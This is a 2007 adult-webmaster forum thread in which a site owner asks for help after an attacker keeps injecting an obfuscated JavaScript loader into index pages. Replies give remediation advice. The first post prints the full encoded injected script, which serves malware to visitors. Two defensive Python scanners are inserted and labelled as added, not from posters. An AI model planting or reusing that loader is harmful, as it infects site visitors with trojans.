Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

New Webmasters ask "How-To" questions here. This is where other fucking Webmasters help.

 
07-28-2007, 04:21 AM   #1
Vippy
Registered User
 
Join Date: Dec 2006
Posts: 5
server hacked! Need help please...

Hey guys

I'm hoping someone can help me here with a problem I am having on a couple of my member sites being hacked.

Someone is managing to hack into my FTP server and embedding a hidden remote file which is inserting malicious codes on my index page, that contain viruses via external URLs. So anyone who reaches my index pages is hit with a trojan detection through their firewall!

The code which gets embedded is always at the bottom of the index source code and it looks like this:

<script language="JavaScript">e = '0x00' + '5F';str1 = "%E4%BC%B7%AA%C0%AD%AC%A7%B4%BB%E3%FE%AA%B7%AD%B7% BE%B7%B4%B7%AC%A7%E6%B8%B7%BC%BC%BB%B2%FE%E2%E4%B7 %BA%AE%BF%B3%BB%C0%AD%AE%BD%E3%FE%B8%AC%AC%B0%E6%F 1%F1%A9%BB%AC%AE%B7%BD%B2%AC%F2%B7%B2%BA%B1%F1%B4% BC%F1%AB%B0%B4%EF%F1%FE%C0%A9%B7%BC%AC%B8%E3%EF%C0 %B8%BB%B7%B9%B8%AC%E3%EF%E2%E4%F1%B7%BA%AE%BF%B3%B B%E2%E4%F1%BC%B7%AA%E2";str=tmp='';for(i=0;i<str1. length;i+=3){tmp =unescape(str1.slice(i,i+3));str=str+String.fromCh arCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>

When I upload my local clean copy of the index page it was overwriting the infected file and he would pop up again with this code every 1 - 2 weeks.

The only further solution I have managed to find so far is to restrict FTP access from anywhere other than my local IP. Then we managed to detect this guy is in Russia and was accessing the remote file without using FTP and we banned all IPs from Russia! However I fear this is only a temporary solution as he can figure this out and spoof his IP address.

Anyone have any ideas what else I can do to keep this asshole away??
07-28-2007, 05:17 AM   #2
masterut
Confirmed User
 
 
Join Date: Jan 2006
Posts: 1,080
Contact info?
07-28-2007, 06:00 AM   #3
martinsc
Too lazy to set a custom title
 
Join Date: Jun 2005
Location: 127.0.0.1
Posts: 27,047
I think someone else had the same issue some weeks ago... try searching GFY's history a bit...
__________________
Make Money
07-28-2007, 06:05 AM   #4
martinsc
Too lazy to set a custom title
 
Join Date: Jun 2005
Location: 127.0.0.1
Posts: 27,047
edit: sorry wrong link...
ignore this...
__________________
Make Money

Last edited by martinsc; 07-28-2007 at 06:06 AM..
07-28-2007, 06:31 AM   #5
modF
Confirmed User
 
Join Date: Aug 2002
Posts: 1,888
Check to see if there is a .htaccess file which is adding a header/footer. Contact your host to figure out which one of your scripts/passwords are insecure.
__________________

I do things
skype:themodF
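
A way to check a web root for the two things described so far, the obfuscated script appended to index pages (post #1) and an .htaccess that adds a header/footer (post #5). This is an added example, not code from any poster; it assumes the loader keeps the unescape / fromCharCode / document.write shape and the XOR 0x5F, minus 127 transform shown in post #1, and that the .htaccess footer is set through PHP's auto_prepend_file / auto_append_file. The sample files, the blob and the footer path are constructed.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import unquote_to_bytes

SCRIPT = re.compile(r"<script\b.*?</script>", re.I | re.S)
BLOB = re.compile(r'"((?:%[0-9A-Fa-f]{2}){4,})"')
# php_value auto_prepend_file / auto_append_file make PHP add a file to every page.
HTACCESS = re.compile(r"^\s*php_value\s+auto_(?:prepend|append)_file\s+(\S+)", re.I | re.M)
TOKENS = ("unescape", "fromCharCode", "document.write")

def decode_blob(blob, key=0x5F, offset=127):
    """Statically undo the loader's (charCode ^ key) - offset step; nothing is executed."""
    return "".join(chr(((b ^ key) - offset) & 0xFFFF) for b in unquote_to_bytes(blob))

def scan_file(path):
    text = path.read_text(errors="replace")
    findings = []
    if path.name == ".htaccess":
        findings += [("htaccess-include", target) for target in HTACCESS.findall(text)]
    for script in SCRIPT.findall(text):
        if all(tok in script for tok in TOKENS):
            findings += [("obfuscated-loader", decode_blob(b)) for b in BLOB.findall(script)]
    return findings

def scan_webroot(root):
    """Map relative path -> findings for every file under root that has any."""
    root = Path(root)
    hits = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        found = scan_file(path)
        if found:
            hits[path.relative_to(root).as_posix()] = found
    return hits

def demo():
    """Constructed sample: the blob decodes to the harmless string <b>ok</b>."""
    loader = ('<script language="JavaScript">e = \'0x00\' + \'5F\';'
              'str1 = "%E4%BE%E2%B1%B5%E4%F1%BE%E2";str=tmp=\'\';'
              'for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));'
              'str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}'
              'document.write(str);</script>')
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "index.html").write_text("<html><body>home</body></html>\n" + loader)
        (root / "clean.html").write_text("<html><script>document.write('hi')</script></html>")
        (root / ".htaccess").write_text("php_value auto_append_file /tmp/placeholder_footer.php\n")
        return scan_webroot(root)

if __name__ == "__main__":
    print(demo())
```

Run against a copy of the site rather than the live server; the decoded string shows what markup the loader would have written without opening the page in a browser.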
07-28-2007, 07:07 AM   #6
aidantrent
beep
 
Join Date: Nov 2005
Location: West Coast
Posts: 236
When a server has been compromised, you *must* reformat the drive and reload the OS. There is no other way to be 100% certain that you've closed all of the backdoors the attacker may have set up.

Once you have the OS reinstalled, here are a couple of security tips to prevent this from happening in the future:

* Run security updates on a daily basis. With Debian-derived systems, this is as simple as 'aptitude update && aptitude upgrade'. Don't forget any custom-installed scripts when you're doing this! For instance, if you run something like ComusThumbs or ArrowTrader, be sure to regularly check their home pages for security announcements.

* Never use any unencrypted services for authentication. You mentioned FTP; anyone can sniff the network traffic and grab your FTP password. Use scp or SFTP instead. The same goes for e-mail: use TLS or SSL SMTP connections for sending mail, and SSL POP or IMAP for receiving it. If you have any web-based control panels, make sure they run over HTTPS, not HTTP. And of course, *never* use telnet to remote-connect.

Personally, on each of my dedicated boxes, the first thing I do is uninstall the unencrypted versions of every server except HTTP and SMTP; it makes it much easier to be certain that all users are using secure logins when things like FTP and POP3 aren't even available. Then I set up certificates to enable TLS over SMTP for sending mail (you need to have an unencrypted SMTP server listening for other servers sending mail to you) and an HTTPS server for all of my web control panels, like phpMyAdmin.

Anyway, good luck getting your server back online!
__________________
JustPicsPlease - Search millions of porn pics
(Or thousands of porn tubes, if that's your style.)

Both sites are desktop- and mobile-friendly.
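
One way to verify the "no unencrypted login services" state described in post #6, as an added example that is not part of the original post: it parses the output of `ss -H -ltn` and reports listeners on the cleartext FTP, telnet, POP3 and IMAP ports, leaving HTTP and SMTP alone as the post does. The sample output is constructed, and the port-to-service mapping assumes default port numbers.

```python
import shutil
import subprocess

# Cleartext login services named in the post; 25 (SMTP) and 80 (HTTP) are kept.
CLEARTEXT = {21: "ftp", 23: "telnet", 110: "pop3", 143: "imap"}

# Constructed sample in the column layout of `ss -H -ltn`.
SAMPLE_SS = """\
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 32 0.0.0.0:21 0.0.0.0:*
LISTEN 0 100 127.0.0.1:143 0.0.0.0:*
LISTEN 0 128 [::]:80 [::]:*
LISTEN 0 100 0.0.0.0:25 0.0.0.0:*
LISTEN 0 100 [::]:110 [::]:*
"""

def cleartext_listeners(ss_output):
    """Return sorted (port, service, bind address, scope) for cleartext listeners."""
    findings = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        # rpartition keeps bracketed IPv6 addresses such as [::] intact.
        addr, _, port = fields[3].rpartition(":")
        if not port.isdigit() or int(port) not in CLEARTEXT:
            continue
        scope = "loopback" if addr in ("127.0.0.1", "[::1]") else "exposed"
        findings.append((int(port), CLEARTEXT[int(port)], addr, scope))
    return sorted(findings)

def live_listeners():
    """Output of ss on this host, or None when ss is not installed."""
    if shutil.which("ss") is None:
        return None
    result = subprocess.run(["ss", "-H", "-ltn"], capture_output=True, text=True, check=True)
    return result.stdout

if __name__ == "__main__":
    for finding in cleartext_listeners(live_listeners() or SAMPLE_SS):
        print(finding)
```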